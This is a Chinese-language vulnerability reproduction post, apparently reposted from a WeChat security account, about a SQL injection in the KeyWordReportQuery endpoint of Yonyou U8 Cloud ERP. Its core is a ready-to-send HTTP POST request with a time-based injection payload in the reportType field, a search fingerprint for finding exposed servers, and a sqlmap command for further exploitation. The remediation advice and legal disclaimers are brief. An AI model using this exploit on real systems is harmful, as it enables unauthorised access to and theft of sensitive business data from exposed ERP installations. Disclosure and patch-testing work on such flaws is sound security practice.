点击
告诉TA吧
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。本文所提供的工具仅用于学习,禁止用于其他目的,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
产品介绍
用友U8 cloud聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。
漏洞介绍
用友U8 Cloud KeyWordDetailReportQuery接口处存在SQL漏洞,攻击者可通过该漏洞获取数据库中的敏感信息。
漏洞编号:暂无
漏洞类型:SQL注入
影响版本:暂不确定
资产测绘
body="开启U8 cloud云端之旅"
漏洞复现
请在授权环境下测试
利用POC进行检测,出现延迟则存在漏洞;
POST /service/~iufo/nc.itf.iufo.mobilereport.data.KeyWordReportQuery HTTP/1.1
Host: 目标IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
{"reportType":"1';waitfor delay '0:0:5'-- ","pageInfo":{"currentPageIndex":1,"pageSize":1},"keyword":[]}
使用sqlmap神器一把嗦,进一步利用(请在合法授权情况下操作)
python sqlmap.py -r POST.txt —random-agent —level 3 -v 3
修复建议
存在该资产企业尽快排查并及时进行修复,修复建议如下:
1.及时关注官网进行更新;
2.安全防护设备限制相关路径访问;
关注我们
点它,分享点赞在看都在这里
原文始发于微信公众号(Guoxin 401):漏洞复现|用友U8 Cloud KeyWordReportQuery SQL注入
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论